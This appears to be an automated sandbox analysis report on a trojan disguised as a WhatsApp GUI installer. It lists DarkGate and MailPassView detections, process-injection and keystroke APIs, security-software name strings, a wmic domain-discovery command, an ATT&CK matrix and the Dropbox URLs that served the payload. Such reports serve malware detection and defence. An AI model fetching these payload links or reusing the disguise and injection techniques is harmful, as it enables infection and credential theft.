Code function: 8_2_00C988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

8_2_00C988CD

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		8_2_00C6A385
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6A354 SetUnhandledExceptionFilter,		8_2_00C6A354

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_0471DCB8 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,

8_2_0471DCB8

Contains functionality to inject threads in other processes

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_0471DCB8 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,

8_2_0471DCB8

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C99369 LogonUserW,

8_2_00C99369

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_00C55240

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA1AC6 SendInput,keybd_event,

8_2_00CA1AC6

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA51E2 mouse_event,

8_2_00CA51E2

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process created: C:\ProgramData\Updater\UpdaterService.exe "C:\ProgramData\Updater\UpdaterService.exe" "C:\ProgramData\Updater\ConfigUpdater.a3x"	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\addbage\gcdkfcc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain	Jump to behavior

Source: C:\ProgramData\addbage\Autoit3.exe

8_2_00C988CD

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_00CA4F1C

Source: UpdaterService.exe, 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230420564.0000000004610000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3939194413.0000000000386000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: UpdaterService.exe, 00000003.00000002.3942036146.0000000004A34000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942163331.000000000568E000.00000004.00000010.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942132454.000000000528E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: UpdaterService.exe, Autoit3.exe	Binary or memory string: Shell_TrayWnd
Source: UpdaterService.exe, 00000003.00000002.3939848242.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerbage\}Y<
Source: UpdaterService.exe, 00000003.00000002.3942036146.0000000004A34000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program managerN
Source: UpdaterService.exe, 00000003.00000002.3939848242.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerhos
Source: UpdaterService.exe, 00000003.00000002.3939848242.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managertxt
Source: UpdaterService.exe, 00000003.00000002.3942036146.0000000004A34000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program manager

Language, Device and Operating System Detection

Source: C:\ProgramData\Updater\UpdaterService.exe

Code function: 3_3_0463B30B cpuid

3_3_0463B30B

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	8_2_0179BF0D
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,	8_2_0179E1F1
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,	8_2_0179E1A5
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	8_2_0179C017
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,GetACP,	8_2_0179F349
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,	8_2_0179C31D
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	8_2_046F5B4C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,	8_2_046F6470
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,GetACP,	8_2_046FCC88
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,	8_2_046FB66C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: GetLocaleInfoA,	8_2_046FB620
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	8_2_046F5C56

Source: C:\ProgramData\Updater\UpdaterService.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\ProgramData\Updater\UpdaterService.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Users\user\Desktop\Whatsapp-GUI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C80030 GetLocalTime,__swprintf,

8_2_00C80030

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C80722 GetUserNameW,

8_2_00C80722

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C7416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

8_2_00C7416A

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C55D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00C55D13

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: UpdaterService.exe, UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: UpdaterService.exe, UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: superantispyware.exe

Stealing of Sensitive Information

Yara detected DarkGate

Source: Yara match	File source: 00000008.00000002.2391824798.0000000004758000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473753332.0000000004568000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3941184211.0000000003F28000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2230520854.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UpdaterService.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 7156, type: MEMORYSTR

Yara detected MailPassView

Source: Yara match	File source: 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UpdaterService.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 7156, type: MEMORYSTR

Source: Autoit3.exe	Binary or memory string: WIN_81
Source: Autoit3.exe	Binary or memory string: WIN_XP
Source: Autoit3.exe	Binary or memory string: WIN_XPe
Source: Autoit3.exe	Binary or memory string: WIN_VISTA
Source: Autoit3.exe	Binary or memory string: WIN_7
Source: Autoit3.exe	Binary or memory string: WIN_8
Source: Autoit3.exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected DarkGate

Source: Yara match	File source: 00000008.00000002.2391824798.0000000004758000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473753332.0000000004568000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3941184211.0000000003F28000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2230520854.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UpdaterService.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 7156, type: MEMORYSTR

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CB696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	8_2_00CB696E
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CB6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_00CB6E32
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0470CCB4 bind,	8_2_0470CCB4

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Timestomp	NTDS	66 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	271 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Whatsapp-GUI.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\ProgramData\Updater\Autoit3.exe	3%	ReversingLabs
C:\ProgramData\Updater\UpdaterService.exe (copy)	3%	ReversingLabs
C:\ProgramData\addbage\Autoit3.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
http://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.comd	0%	Avira URL Cloud	safe
https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com/cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJ	0%	Avira URL Cloud	safe
http://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com/cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJnYiaT0oc5SDFG-Q_f17zZOYwtbElAtBx9tczKziQAR17ipbY3BXl7uvQEULuDJYfx524fWrqmFpUco76qNtDQVu86eEev0aoq4uaSXfphqHI8Aq1eH1z9Bj6TBgo/file?dl=1	0%	Avira URL Cloud	safe
http://www-env.dropbox-dns.comd	0%	Avira URL Cloud	safe
https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
http://edge-block-www-env.dropbox-dns.comd	0%	Avira URL Cloud	safe
http://www.dropbox.comd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
edge-block-www-env.dropbox-dns.com	162.125.69.15	true	false	high
www-env.dropbox-dns.com	162.125.65.18	true	false	high
www.dropbox.com	unknown	unknown	false	high
uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com/cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJnYiaT0oc5SDFG-Q_f17zZOYwtbElAtBx9tczKziQAR17ipbY3BXl7uvQEULuDJYfx524fWrqmFpUco76qNtDQVu86eEev0aoq4uaSXfphqHI8Aq1eH1z9Bj6TBgo/file?dl=1	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/puclhgu65e9r37o3vcp9m/yutighh.zip?rlkey=csgz30n1xx1twdk9ue4m4p16s&st=nll27ti7&dl=1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.dropbox.com/service_worker.js	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paper.dropbox.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellofax.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pal-test.adyen.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.dropbox.com	Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/cloud-docs/edit	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellosign.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellosign.com/	Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	false		high
